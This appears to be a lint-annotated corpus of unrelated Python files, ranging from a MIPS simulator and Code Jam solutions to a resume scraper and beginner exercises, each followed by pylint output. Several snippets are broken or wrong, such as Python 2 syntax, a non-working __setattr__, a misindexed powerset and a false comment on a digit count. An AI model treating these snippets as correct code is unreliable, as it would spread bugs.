1 # ZSB - Opdracht 2 # 2 # errorreport.py # 3 # 16/06/2017 # 4 # # 5 # Anna Stalknecht - 10792872 # 6 # Claartje Barkhof - 11035129 # 7 # Group C # 8 # # 9 ################################ 10 11 ''' 12 error report 13 We started implementing the board_position_to_cartesian function. This function was 14 tested by printing the cartesian values to see if thehy matched our calculation. 15 We also printed the board_position and the value of index function to see if it was working 16 correctly. 17 18 Then we implemented the high_path function which we tested by running the program and 19 pressing compute high path. We then checked the joints_simulation.txt file and saw that 20 something had changed. We couldn't really test it more because we first had to implement 21 the inverse_kinematics. 22 23 So we made the inverse_kinematics function. And now we had te possibility to test it by 24 running the program. At first the program wasn't working properly because it took chesspieces 25 from the table instead of from the chessboard. We found out that it was because we switched x 26 and z axes. 27 28 Then we tried rotating the chessboard and we found out that our board_position_to_cartesian wasn't 29 working properly. It was only working when we turned the chessboard 0 or 180 degrees. That was because 30 we walked from h8 in the right angle but it didn't work the way we want. Than we changed 31 the function so it would calculate the cartesian from the original angle (0 degrees), and than 32 calculationg that position to the new position at the right angle. Then it worked. 33 34 We then had an error rotationg the chessboard -20degrees, the shoulder_angle gave a math error. 35 That was because the arms are not big enough to reach the top of the board at that angle. 36 When placed the board closer to the gripper our program worked properly again. 37 38 39 '''
Clean Code: No Issues Detected
1 import json 2 import pymongo 3 from bs4 import BeautifulSoup 4 client = pymongo.MongoClient("mongodb+srv://localhost") 5 db = client.test 6 col = db["resumes"] 7 documents = col.find({},no_cursor_timeout=True) # if limit not necessary then discard limit 8 print(type(documents)) 9 new_col = db["resultResumes"] 10 for i in documents: 11 dict = {} 12 doc = i["Resume-Html"] 13 soup = BeautifulSoup(''.join(doc),features="html.parser") 14 dict['_id'] = i['_id'] 15 dict['createdTime'] = i['createdTime'] 16 dict['Title'] = i['Title'] 17 location = soup.find('p', attrs={'class' : 'locality'}) 18 if location is not None: 19 loc = location.get_text() 20 locspace = " ".join(loc.split()) 21 dict['Location'] = locspace 22 else: 23 dict['Location'] = "" 24 education = soup.find('div',attrs={'class':'section-item education-content'}) 25 if education is not None: 26 edu= education.get_text() 27 eduspace = " ".join(edu.split()) 28 edurem = eduspace.replace('Education', '') 29 dict['Education'] = edurem 30 else: 31 dict['Education'] = "" 32 33 workexperience = soup.find('div', attrs={'class':'section-item workExperience-content'}) 34 if workexperience is not None: 35 # print(workexperience.get_text()) 36 bza = [] 37 abcd = soup.findAll('div', attrs={'class': 'work-experience-section'}) 38 k = 0 39 for j in range(len(abcd)): 40 41 print('---------------------------------------------------') 42 print(j) 43 worka = abcd[j].find('p', attrs={'class': 'work_title'}) 44 if worka is not None: 45 workaa = worka.get_text() 46 workspa = " ".join(workaa.split()) 47 workb = abcd[j].find('div', attrs={'class': 'work_company'}) 48 if workb is not None: 49 workba = workb.get_text() 50 workspb = " ".join(workba.split()) 51 workc = abcd[j].find('p', attrs={'class': 'work_dates'}) 52 if workc is not None: 53 workca = workc.get_text() 54 workspc = " ".join(workca.split()) 55 workd = abcd[j].find('p', attrs={'class': 'work_description'}) 56 if workd is not None: 57 workda = workd.get_text() 58 workspd = " ".join(workda.split()) 59 vskp = workspa + workspb + workspc + workspd 60 61 # vskp.append(wora) 62 # vskp.append(worb) 63 # vskp.append(worc) 64 # vskp.append(word) 65 66 bza.append(vskp) 67 68 69 print('---------------------------------------------------') 70 print(bza) 71 72 dict['WorkExperience'] = bza 73 else: 74 dict['WorkExperience'] = "" 75 currentcompany = soup.find('div', attrs={'class':'work_company'}) 76 if currentcompany is not None: 77 company= currentcompany.get_text() 78 companyspace = " ".join(company.split()) 79 dict['CurrentCompany'] = companyspace 80 else: 81 dict['CurrentCompany'] = "" 82 skills = soup.find('div', attrs={'class':'data_display'}) 83 if skills is not None: 84 skill= skills.get_text() 85 skillspace = " ".join(skill.split()) 86 skillarr = [] 87 skillarr.append(skillspace) 88 dict['Skills'] = skillarr 89 else: 90 dict['Skills'] = "" 91 introduction = soup.find('p', attrs={'class' : 'summary'}) 92 if introduction is not None: 93 introduction = introduction.get_text() 94 introductionspace = " ".join(introduction.split()) 95 dict['Introduction'] = introductionspace 96 else: 97 dict['Introduction'] = "" 98 99 100 new_col.insert_one(dict)
11 - warning: redefined-builtin 59 - error: possibly-used-before-assignment 59 - error: possibly-used-before-assignment 59 - error: possibly-used-before-assignment 59 - error: possibly-used-before-assignment 1 - warning: unused-import
1 """ 2 # Speaking in Tongues 3 4 ## Problem 5 6 We have come up with the best possible language here at Google, called Googlerese. To translate text into 7 Googlerese, we take any message and replace each English letter with another English letter. This mapping 8 is one-to-one and onto, which means that the same input letter always gets replaced with the same output 9 letter, and different input letters always get replaced with different output letters. A letter may be 10 replaced by itself. Spaces are left as-is. 11 12 For example (and here is a hint!), our awesome translation algorithm includes the following three mappings: 13 'a' -> 'y', 'o' -> 'e', and 'z' -> 'q'. This means that "a zoo" will become "y qee". 14 15 Googlerese is based on the best possible replacement mapping, and we will never change it. It will always be 16 the same. In every test case. We will not tell you the rest of our mapping because that would make the problem 17 too easy, but there are a few examples below that may help. 18 19 Given some text in Googlerese, can you translate it to back to normal text? 20 21 Solving this problem 22 23 Usually, Google Code Jam problems have 1 Small input and 1 Large input. This problem has only 1 Small input. 24 Once you have solved the Small input, you have finished solving this problem. 25 26 ### Input 27 28 The first line of the input gives the number of test cases, T. T test cases follow, one per line. 29 30 Each line consists of a string G in Googlerese, made up of one or more words containing the letters 'a' - 'z'. 31 There will be exactly one space (' ') character between consecutive words and no spaces at the beginning or at 32 the end of any line. 33 34 ### Output 35 36 For each test case, output one line containing "Case #X: S" where X is the case number and S is the string that 37 becomes G in Googlerese. 38 39 ### Limits 40 41 1 <= T <= 30. 42 G contains at most 100 characters. 43 None of the text is guaranteed to be valid English. 44 45 ### Sample 46 47 Input 48 3 49 ejp mysljylc kd kxveddknmc re jsicpdrysi 50 rbcpc ypc rtcsra dkh wyfrepkym veddknkmkrkcd 51 de kr kd eoya kw aej tysr re ujdr lkgc jv 52 53 Output 54 Case #1: our language is impossible to understand 55 Case #2: there are twenty six factorial possibilities 56 Case #3: so it is okay if you want to just give up 57 58 """ 59 60 import string, urllib 61 62 input = 'https://raw.github.com/gist/2404633/65abea31f1a9504903f343e762d007d95ef0540a/GoogleCodeJam-SpeakingInTongues.txt' 63 decoded = string.maketrans('ynficwlbkuomxsevzpdrjgthaq', 'abcdefghijklmnopqrstuvwxyz') 64 getdata = urllib.urlopen(input).read().split('\n')[1:] 65 66 for i, j in enumerate(getdata): 67 print "Case #%d: %s" % (i+1, j.translate(decoded)) 68
67 - error: syntax-error
1 def isPrime(n): 2 import re 3 return re.match(r'^1?$|^(11+?)\1+$', '1' * n) == None
Clean Code: No Issues Detected
1 def mapper(function, *params): 2 rez = [] 3 for args in zip(*params): 4 rez.append(function(*args)) 5 return rez 6 7 print mapper(abs, [-3, 5, -1, 42, 23]) 8 print mapper(pow, [1, 2, 3], [2, 3, 4, 5])
7 - error: syntax-error
1 import subprocess 2 3 def shell(command, stdout=True): 4 if stdout: 5 return subprocess.check_output(command, shell=True) 6 return subprocess.check_call(command, shell=True) 7 8 print shell('ls')
8 - error: syntax-error
1 print [x % 3/2 * 'Fizz' + x % 5/4 * 'Buzz' or x + 1 for x in range(100)]
1 - error: syntax-error
1 def fibonacci(n): 2 if n == 0: 3 return (0, 1) 4 else: 5 a, b = fibonacci(n/2) 6 c = a*(2*b - a) 7 d = b*b + a*a 8 return (c, d) if n%2 == 0 else (d, c+d) 9 10 print fibonacci(100000)[0]
10 - error: syntax-error
1 # Run this script and enter 3 numbers separated by space 2 # example input '5 5 5' 3 a,b,c=map(int,raw_input().split()) 4 for i in range(b+c+1):print(' '*(c-i)+((' /|'[(i>c)+(i>0)]+'_'*4)*(a+1))[:-4]+('|'*(b+c-i))[:b]+'/')[:5*a+c+1]
3 - error: undefined-variable 4 - warning: expression-not-assigned
1 class DictObject(dict): 2 3 def __getattr__(self, k): 4 return self[k] 5 6 def __setattr__(self, k, v): 7 return self[k] 8 9 10 obj = DictObject({'key' : 'value'}) 11 print obj.key
11 - error: syntax-error
1 newlist = sorted(arr, key=lambda k: k['keyName']) 2 3 import operator 4 newlist = sorted(arr, key=operator.itemgetter('keyName'))
1 - error: undefined-variable 4 - error: undefined-variable
1 import functools 2 3 def my_check(func): 4 5 @functools.wraps(func) 6 def decorated_view(*args, **kwargs): 7 if 1 != 2: 8 return 'failure' 9 return func(*args, **kwargs) 10 11 return decorated_view 12 13 14 if __namae__ == '__main__': 15 16 @my_check 17 def hello(): 18 return 'success'
5 - warning: bad-indentation 6 - warning: bad-indentation 7 - warning: bad-indentation 8 - warning: bad-indentation 9 - warning: bad-indentation 11 - warning: bad-indentation 16 - warning: bad-indentation 17 - warning: bad-indentation 18 - warning: bad-indentation 7 - refactor: comparison-of-constants 14 - error: undefined-variable
1 def genPrimes(n): 2 n, correction = n - n%6 + 6, 2 - (n % 6 > 1) 3 sieve = [True] * (n/3) 4 for i in xrange(1, int(n**0.5) / 3 + 1): 5 if sieve[i]: 6 k = 3*i+1|1 7 sieve[k*k/3 ::2*k] = [False] * ((n/6 - k*k/6-1) / k+1) 8 sieve[k*(k-2*(i&1) + 4)/3 :: 2*k] = [False] * ((n/6 - k*(k-2*(i&1)+4)/6-1) / k+1) 9 10 return [2,3] + [3*i+1|1 for i in xrange(1,n/3-correction) if sieve[i]] 11 12 print genPrimes(10000)
12 - error: syntax-error
1 def stringPermutations(string): 2 rez = [] 3 4 if len(string) < 2: 5 rez.append(string) 6 else: 7 for position in range(len(string)): 8 perms = string[:position] + string[position+1:] 9 for i in stringPermutations(perms): 10 rez.append(string[position:position+1] + i) 11 12 return rez 13 14 print stringPermutations('abc') # ['abc', 'acb', 'bac', 'bca', 'cab', 'cba']
14 - error: syntax-error
1 ''' 2 Facebook Hacker Cup 2012 Qualification Round 3 4 Alphabet Soup 5 Alfredo Spaghetti really likes soup, especially when it contains alphabet pasta. Every day he constructs 6 a sentence from letters, places the letters into a bowl of broth and enjoys delicious alphabet soup. 7 8 Today, after constructing the sentence, Alfredo remembered that the Facebook Hacker Cup starts today! 9 Thus, he decided to construct the phrase "HACKERCUP". As he already added the letters to the broth, 10 he is stuck with the letters he originally selected. Help Alfredo determine how many times he can place 11 the word "HACKERCUP" side-by-side using the letters in his soup. 12 13 Input 14 The first line of the input file contains a single integer T: the number of test cases. T lines follow, 15 each representing a single test case with a sequence of upper-case letters and spaces: the original 16 sentence Alfredo constructed. 17 18 Output 19 Output T lines, one for each test case. For each case, output "Case #t: n", where t is the test case 20 number (starting from 1) and n is the number of times the word "HACKERCUP" can be placed side-by-side 21 using the letters from the sentence. 22 23 Constraints 24 1 < T <= 20 25 Sentences contain only the upper-case letters A-Z and the space character 26 Each sentence contains at least one letter, and contains at most 1000 characters, including spaces 27 ''' 28 29 import urllib 30 def parse(string): 31 d = {'H' : 0, 'A' : 0, 'C' : 0, 'K' : 0, 'E' : 0, 'R' : 0, 'U' : 0, 'P' : 0} 32 d.update({s: string.count(s) for s in string if s in d}) 33 d['C'] /= 2 34 return min(d.values()) 35 36 file = urllib.urlopen("https://raw.github.com/gist/1651354/67521ff0ac3332ca68713dfcd474a431c2d6c427/AlphabetSoupInput.txt").read().split('\n') 37 open('output.txt', 'w').write( "\n".join( [("Case #%d: %d" % (i, parse(file[i]))) for i in range(1, len(file))]))
31 - warning: bad-indentation 32 - warning: bad-indentation 33 - warning: bad-indentation 34 - warning: bad-indentation 36 - error: no-member 37 - refactor: consider-using-with 37 - warning: unspecified-encoding
1 def stringCombinations(string, right = ''): 2 if not string: 3 print right 4 return 5 6 stringCombinations(string[1:], string[0] + right) 7 stringCombinations(string[1:], right) 8 9 stringCombinations('abcd')
3 - error: syntax-error
1 """ 2 Beautiful Strings 3 4 When John was a little kid he didn't have much to do. There was no internet, no Facebook, 5 and no programs to hack on. So he did the only thing he could... he evaluated the beauty 6 of strings in a quest to discover the most beautiful string in the world. 7 8 Given a string s, little Johnny defined the beauty of the string as the sum of the beauty 9 of the letters in it. 10 11 The beauty of each letter is an integer between 1 and 26, inclusive, and no two letters 12 have the same beauty. Johnny doesn't care about whether letters are uppercase or lowercase, 13 so that doesn't affect the beauty of a letter. 14 (Uppercase 'F' is exactly as beautiful as lowercase 'f', for example.) 15 16 You're a student writing a report on the youth of this famous hacker. You found the string 17 that Johnny considered most beautiful. What is the maximum possible beauty of this string? 18 19 20 Input 21 The input file consists of a single integer m followed by m lines. 22 23 Output 24 Your output should consist of, for each test case, a line containing the string "Case #x: y" 25 where x is the case number (with 1 being the first case in the input file, 2 being the second, etc.) 26 and y is the maximum beauty for that test case. 27 28 Constraints 29 5 <= m <= 50 30 2 <= length of s <= 500 31 32 33 Example input Example output 34 35 5 36 ABbCcc Case #1: 152 37 Good luck in the Facebook Hacker Cup this year! Case #2: 754 38 Ignore punctuation, please :) Case #3: 491 39 Sometimes test cases are hard to make up. Case #4: 729 40 So I just go consult Professor Dalves Case #5: 646 41 42 """ 43 44 import re, operator, urllib2 45 46 47 def getScore(s): 48 s = re.sub('[^A-Za-z]', '', s).lower() 49 total, x, d = 0, 26, {} 50 d.update({j: s.count(j) for j in s}) 51 data = sorted(d.iteritems(), key=operator.itemgetter(1))[::-1] 52 53 for i in data: 54 total += i[1] * x 55 x -= 1 56 57 return total 58 59 60 file = urllib2.urlopen('https://gist.github.com/raw/4647356/f490a1df2ccda25553c70086205e38fc7e53647e/FBHackerCupBeautifulStrings.txt').read().split('\n') 61 open('output.txt', 'w').write( "\n".join( [("Case #%d: %d" % (i, getScore(file[i]))) for i in range(1, len(file))][:-1])) 62
51 - error: no-member 61 - refactor: consider-using-with 61 - warning: unspecified-encoding
1 def eratosthenes_sieve(n): 2 candidates = list(range(n+1)) 3 fin = int(n**0.5) 4 5 for i in xrange(2, fin+1): 6 if candidates[i]: 7 candidates[2*i::i] = [None] * (n//i - 1) 8 9 return [i for i in candidates[2:] if i]
5 - error: undefined-variable
1 def qsort(list): 2 return [] if list==[] else qsort([x for x in list[1:] if x < list[0]]) + [list[0]] + qsort([x for x in list[1:] if x >= list[0]])
1 - warning: redefined-builtin
1 def multiply(x, y): 2 if x.bit_length() <= 1536 or y.bit_length() <= 1536: 3 return x * y; 4 else: 5 n = max(x.bit_length(), y.bit_length()) 6 half = (n + 32) / 64 * 32 7 mask = (1 << half) - 1 8 xlow = x & mask 9 ylow = y & mask 10 xhigh = x >> half 11 yhigh = y >> half 12 13 a = multiply(xhigh, yhigh) 14 b = multiply(xlow + xhigh, ylow + yhigh) 15 c = multiply(xlow, ylow) 16 d = b - a - c 17 18 return (((a << half) + d) << half) + c
3 - warning: unnecessary-semicolon 2 - refactor: no-else-return
1 array = ['duck', 'duck', 'goose'] 2 print max(set(array), key=array.count)
2 - error: syntax-error
1 def powerset(array): 2 ps = [[]] 3 for i in array: 4 ps += [x + [array[i]] for x in ps] 5 return ps 6 7 print powerset([0, 1, 2, 3])
7 - error: syntax-error
1 def lengthOfNumber(n): 2 from math import log10, floor 3 return int(floor(log10(n)+1)) 4 5 print lengthOfNumber(12321) # should give 2
5 - error: syntax-error
1 NO_STUDENTS = "There is no students for this teacher" 2 3 4 class Person(object): 5 def __init__(self, name): 6 self.name = name 7 8 def __str__(self): 9 return "My name is %s" % self.name 10 11 12 class Student(Person): 13 def __init__(self, name, group): 14 super(Student, self).__init__(name) 15 self.group = group 16 17 def __str__(self): 18 return "My name is %s and I'm from %s group" % (self.name, self.group) 19 20 def print_group(self): 21 return "My group is %s" % self.group 22 23 24 class Teacher(Person): 25 def __init__(self, name): 26 super(Teacher, self).__init__(name) 27 self.students = [] 28 29 def add_student(self, student): 30 self.students.append(student) 31 32 def remove_student(self, student): 33 for current_student in self.students: 34 if student.name == current_student.name: 35 self.students.remove(current_student) 36 37 def __str__(self): 38 return "My name is %s and my students are:\n%s" % (self.name, self.get_all_students()) 39 40 def get_all_students(self): 41 if self.students: 42 return "\n".join("%s" % st for st in self.students) 43 else: 44 return NO_STUDENTS 45 46 47 if __name__ == "__main__": 48 alice_student = Student("Alice", "12") 49 bob_student = Student("Bob", "12") 50 alex_teacher = Teacher("Alex") 51 assert alex_teacher.get_all_students() == NO_STUDENTS 52 alex_teacher.add_student(alice_student) 53 assert alex_teacher.get_all_students() == "%s" % alice_student 54 alex_teacher.add_student(bob_student) 55 print(alex_teacher) 56 alex_teacher.remove_student(alice_student) 57 assert alex_teacher.get_all_students() == "%s" % bob_student
4 - refactor: useless-object-inheritance 4 - refactor: too-few-public-methods 14 - refactor: super-with-arguments 26 - refactor: super-with-arguments 41 - refactor: no-else-return
1 #long ** is speciaal karakter betekend eigenlijk 2 tot de 123 2 MijnBankRekeningNummer = 2**123 3 4 #char 5 char VoorletterNaam = 'r'
5 - error: syntax-error
1 #python heeft alleen float 2 ditIsEenfloat = 0.2422 3 4 #decimal 5 hoeveelKidsHebJe = decimal('1.31')
5 - error: undefined-variable
1 #int 2 hoeveelKopjesSuiker = 2 3 4 #bool 5 IsDezePersoonMijnMatch = false 6 IsDezePersoonMijnMatch = true 7 8 #string 9 spreekwoord = "De kat op het spek binden" 10
5 - error: undefined-variable 6 - error: undefined-variable
1 def to_integer(binary_number): 2 if not isinstance(binary_number, str): 3 raise Exception() 4 5 return int(binary_number, 2) 6 7 8 def to_binary(number): 9 if not isinstance(number, int): 10 raise Exception() 11 12 return "{:0b}".format(number) 13 14 15 def extend_to_bits(binary_number, bits = 32): 16 if not isinstance(binary_number, str): 17 return None 18 19 number_length = len(binary_number) 20 21 result = bits - number_length 22 23 zero_fill = "0" * result 24 25 return "{}{}".format(zero_fill, binary_number) 26 27 28 def to_binaryC2(number, bits = 32): 29 if not isinstance(number, int): 30 raise Exception() 31 32 if number >= 0 : 33 number = to_binary(number) 34 number = extend_to_bits(number, bits) 35 return number 36 else: 37 number = 2**bits + number 38 number = to_binary(number) 39 number = extend_to_bits(number, bits) 40 return number 41 42 43 def to_decimalC2(binary_number): 44 if not isinstance(binary_number, str): 45 return None 46 47 bits = len(binary_number) 48 49 decimal = int(binary_number, 2) 50 51 if binary_number[0] == '0': 52 return decimal 53 else: 54 decimal = - (2**bits) + decimal 55 return decimal
3 - warning: broad-exception-raised 10 - warning: broad-exception-raised 30 - warning: broad-exception-raised 32 - refactor: no-else-return 51 - refactor: no-else-return
1 from utils import ( 2 extend_to_bits, 3 to_binary, 4 to_integer, 5 to_binaryC2, 6 to_decimalC2 7 ) 8 9 10 class ALU: 11 12 def makeSum(self, a, b): 13 14 result = to_decimalC2(a) + to_decimalC2(b) 15 16 if result > (2**31 -1) or result < -(2**31): 17 print("{}OVERFLOW OCURRENCE{}".format("-" * 20, "-" * 7)) 18 19 result = to_binaryC2(result) 20 return result 21 22 def makeSub(self, a, b): 23 24 result = to_decimalC2(a) - to_decimalC2(b) 25 26 if result > (2**31 -1) or result < -(2**31): 27 print("{}OVERFLOW OCURRENCE".format("-" * 26)) 28 29 result = to_binaryC2(result) 30 31 return result 32 33 def makeAnd(self, a, b): 34 35 a = int(a, 2) 36 b = int(b, 2) 37 38 result = to_binary((a & b)) 39 40 return extend_to_bits(result) 41 42 def makeOr(self, a, b): 43 44 a = int(a, 2) 45 b = int(b, 2) 46 47 result = to_binary((a | b)) 48 49 return extend_to_bits(result) 50 51 def makeNot(self, a): 52 a_len = len(a) 53 54 a = to_decimalC2(a) 55 56 result = to_binaryC2(~a, a_len) 57 58 return result
1 - warning: unused-import
1 # Intruçoes que o programa reconhece 2 FUNCTIONS = { 3 '101011': 'sw', 4 '100011': 'lw', 5 '100000': 'add', 6 '100010': 'sub', 7 '100101': 'or', 8 '100100': 'and' 9 }
Clean Code: No Issues Detected
1 from memory import RegistersBank, Memory 2 from logic import ALU 3 from instructions import PC 4 from control import ( 5 ControlSw, 6 ControlLw, 7 ControlAdd, 8 ControlSub, 9 ControlAnd, 10 ControlOr, 11 ) 12 13 14 class CPU: 15 def __init__(self): 16 self.alu = ALU() 17 self.pc = PC() 18 self.registers = RegistersBank() 19 self.memory = Memory() 20 self.control_types = { 21 'add': ControlAdd(self), 22 'sub': ControlSub(self), 23 'and': ControlAnd(self), 24 'or': ControlOr(self), 25 'lw': ControlLw(self), 26 'sw': ControlSw(self) 27 } 28 29 def execute(self): 30 for instruction in self.pc.get_instructions(): 31 instruction_func = instruction.get_func() 32 33 self.control_types[instruction_func].execute()
14 - refactor: too-few-public-methods
1 from core import CPU 2 3 4 if __name__ == "__main__": 5 cpu = CPU() 6 cpu.execute()
Clean Code: No Issues Detected
1 import random 2 from utils import to_binary, extend_to_bits, to_binaryC2 3 4 5 class BaseMemory: 6 7 def __init__(self): 8 self.data = {} 9 10 def set_value(self, address, value): 11 """ 12 Set a value with a given address 13 """ 14 15 self.data[address] = value 16 17 return True 18 19 def get_value(self, address): 20 """ 21 Return a value with a given address 22 """ 23 24 return self.data[address] 25 26 27 class RegistersBank(BaseMemory): 28 data = {} 29 30 def __new__(cls, *args, **kwargs): 31 """ 32 Make the BaseMemory a Monostate class 33 """ 34 obj = super(RegistersBank, cls).__new__(cls, *args, **kwargs) 35 obj.__dict__ = cls.data 36 37 return obj 38 39 def __init__(self): 40 total_registers = 2**5 41 42 for i in range(total_registers): 43 binary_number = to_binary(i) 44 if len(binary_number) < 5: 45 zero_fill = 5 - len(binary_number) 46 binary_number = "{}{}".format( 47 "0" * zero_fill, 48 binary_number 49 ) 50 51 if i == 8: 52 self.data[binary_number] = extend_to_bits(to_binary(16)) 53 else: 54 self.data[binary_number] = False 55 56 57 class Memory(BaseMemory): 58 data = {} 59 60 def __new__(cls, *args, **kwargs): 61 """ 62 Make the BaseMemory a Monostate class 63 """ 64 obj = super(Memory, cls).__new__(cls, *args, **kwargs) 65 obj.__dict__ = cls.data 66 67 return obj 68 69 def __init__(self): 70 total_data = 2**8 71 72 for i in range(total_data): 73 binary_number = to_binary(i) 74 binary_number = extend_to_bits(to_binary(i)) 75 76 random_number = to_binaryC2( 77 random.randint(-(2**31), (2**31) - 1) 78 ) 79 self.data[binary_number] = random_number 80
39 - warning: super-init-not-called 69 - warning: super-init-not-called
1 from li import FUNCTIONS 2 from utils import extend_to_bits 3 4 class MipsInstruction: 5 op = None 6 rs = None 7 rt = None 8 rd = None 9 shamt = None 10 func = None 11 offset = None 12 instruction_type = None 13 instruction = None 14 15 def __init__(self, instruction): 16 if not (isinstance(instruction, str) or len(instruction) == 32): 17 raise Exception() 18 19 self.instruction = instruction.replace('\n', '') 20 self.op = self.instruction[:6] 21 22 if self.op == '000000': 23 self._configure_to_registers() 24 else: 25 self._configure_to_imediate() 26 27 def _configure_to_imediate(self): 28 self.instruction_type = 'I' 29 self.rs = self.instruction[6:11] 30 self.rt = self.instruction[11:16] 31 self.offset = self.instruction[16:32] 32 33 return self.instruction 34 35 def _configure_to_registers(self): 36 self.instruction_type = 'R' 37 self.rs = self.instruction[6:11] 38 self.rt = self.instruction[11:16] 39 self.rd = self.instruction[16:21] 40 self.shamt = self.instruction[21:26] 41 self.func = self.instruction[26:32] 42 43 return self.instruction 44 45 def has_offset(self): 46 if self.instruction_type == 'R': 47 return False 48 49 return True 50 51 def get_type(self): 52 return self.instruction_type 53 54 def get_function(self): 55 return self.func 56 57 def get_registers(self): 58 registers = { 59 'rs': self.rs, 60 'rt': self.rt, 61 'rd': self.rd 62 } 63 return registers 64 65 def get_offset(self): 66 if not self.has_offset(): 67 return None 68 69 return extend_to_bits(self.offset) 70 71 def get_func(self): 72 if self.op != '000000': 73 return FUNCTIONS[self.op] 74 75 return FUNCTIONS[self.func] 76 77 def __repr__(self): 78 representation = "-" * 64 79 representation += \ 80 "\nInstruction: {}\nType: {}\nOperation: {}\n".format( 81 self.instruction, 82 self.instruction_type, 83 self.get_func() 84 ) 85 86 representation += "-" * 64 87 88 return representation 89 90 91 class PC: 92 def __init__(self, filename="instructions_file.txt"): 93 self.file = open(filename, 'r') 94 self.next_instruction = None 95 96 def get_instructions(self): 97 """ 98 Return a mips instruction object 99 for each instruction in the file 100 """ 101 102 for instruction in self.file.readlines(): 103 if self.next_instruction: 104 self.next_instruction = MipsInstruction(instruction) 105 else: 106 self.next_instruction = MipsInstruction(instruction) 107 108 yield self.next_instruction
28 - warning: bad-indentation 29 - warning: bad-indentation 30 - warning: bad-indentation 31 - warning: bad-indentation 33 - warning: bad-indentation 36 - warning: bad-indentation 37 - warning: bad-indentation 38 - warning: bad-indentation 39 - warning: bad-indentation 40 - warning: bad-indentation 41 - warning: bad-indentation 43 - warning: bad-indentation 4 - refactor: too-many-instance-attributes 17 - warning: broad-exception-raised 93 - warning: unspecified-encoding 93 - refactor: consider-using-with 91 - refactor: too-few-public-methods
1 from django.urls import path 2 from . import views 3 4 5 urlpatterns = [ 6 path('traider', views.traider,name='traider'), 7 path('add_traid', views.add_traid,name='add_traid'), 8 path('compleat_traid', views.compleat_traid,name='compleat_traid'), 9 path('get_user_info', views.print_convertion,name='get_user_info'), 10 path('convertion', views.print_convertion,name='convertion'), 11 path('print_user', views.print_user,name='print_user'), 12 path('doit', views.doit,name='doit') 13 14 ] 15 #print_user 16
2 - error: no-name-in-module
1 import requests 2 r = requests.get('http://127.0.0.1:8080/number?number=1') 3 #print(r.status_code) 4 #print(r.text) 5 if "One" in r.text: 6 print("Passed Test") 7 else: 8 print("Failed Test") 9 10 if "Ok" in r.text: 11 print("Passed Test") 12 else: 13 print("Failed Test") 14 15 16 r = requests.get('http://127.0.0.1:8080/number?number=8') 17 #print(r.status_code) 18 #print(r.text) 19 if "Eight" in r.text: 20 print("Passed Test") 21 else: 22 print("Failed Test") 23 24 25 26 r = requests.get('http://127.0.0.1:8080/number?number=5A') 27 #print(r.status_code) 28 #print(r.text) 29 if "Five" in r.text: 30 print("Failed Test") 31 else: 32 print("Passed Test") 33 34 if "NAN" in r.text: 35 print("Passed Test") 36 else: 37 print("Failed Test") 38 39 40 r = requests.get('http://127.0.0.1:8080/number?number=') 41 #print(r.status_code) 42 #print(r.text) 43 if "NAN" in r.text: 44 print("Passed Test") 45 else: 46 print("Failed Test") 47 48 49 r = requests.get('http://127.0.0.1:8080/number?number=1000000000000000000000000000') 50 #print(r.status_code) 51 #print(r.text) 52 if "NTL" in r.text: 53 print("Passed Test") 54 else: 55 print("Failed Test") 56 57 r = requests.get('http://127.0.0.1:8080/number') 58 print(r.status_code) 59 print(r.text) 60 if "NAN" in r.text: 61 print("Passed Test") 62 else: 63 print("Failed Test") 64 65 r = requests.get('http://127.0.0.1:8080/number',data = {'number': '1'}) 66 67 print(r.status_code) 68 print(r.text) 69 if "NAN" in r.text: 70 print("Passed Test") 71 else: 72 print("Failed Test")
2 - warning: missing-timeout 16 - warning: missing-timeout 26 - warning: missing-timeout 40 - warning: missing-timeout 49 - warning: missing-timeout 57 - warning: missing-timeout 65 - warning: missing-timeout
1 age = 20 2 name = 'zhuly' 3 print('{0} was {1} years old'.format(name, age))
Clean Code: No Issues Detected
1 2 def sayhello(): 3 print('hello wolrd,hello python!') 4 5 __version__='0.1'
Clean Code: No Issues Detected
1 def func(a, b=5, c=10): 2 print('a=', a, ' b=', b, ' c=', c) 3 4 5 func(2, 7) 6 func(2, c=23) 7 func(c=23,a=9)
Clean Code: No Issues Detected
1 number = 23 2 while True: 3 4 guess = int(input('请输入一个整数:')) 5 if guess == number: 6 print('恭喜,你猜对了。') 7 break 8 elif guess < number: 9 print('你猜小了') 10 else: 11 print('你猜大了') 12 13 print('end')
5 - refactor: no-else-break
1 poem = '''\ 2 当工作完成时 3 编程是有趣的 4 如果想让你的工作有趣 5 使用Python! 6 ''' 7 8 f = open('poem.txt', 'w') 9 f.write(poem) 10 f.close() 11 12 f = open('poem.txt', 'r') 13 14 while(True): 15 line = f.readline() 16 if len(line) == 0: 17 break 18 print(line, end='') 19 f.close()
8 - warning: unspecified-encoding 8 - refactor: consider-using-with 12 - warning: unspecified-encoding 12 - refactor: consider-using-with
1 def sayHello(): 2 print('hello world,hello python!') 3 4 sayHello()
Clean Code: No Issues Detected
1 2 def reverse(text): 3 return text[::-1] 4 5 6 def is_palindrome(text): 7 return text == reverse(text) 8 9 10 something=input('输入文本:') 11 12 if is_palindrome(something): 13 print("是的,这是回文") 14 else: 15 print("这不是回文")
Clean Code: No Issues Detected
1 import pickle 2 3 # 我们将要存储对象的文件名 4 shoplistfile = 'shoplist.data' 5 6 # 购物清单 7 shoplist = ['苹果', '芒果', '胡萝卜'] 8 9 # 定到文件 10 f = open(shoplistfile, 'wb') 11 12 pickle.dump(shoplist, f) 13 f.close() 14 15 del shoplist # 释放shoplist变量 16 17 # 从仓库读回 18 f = open(shoplistfile, 'rb') 19 storedlist = pickle.load(f) 20 f.close() 21 print(storedlist)
10 - refactor: consider-using-with 18 - refactor: consider-using-with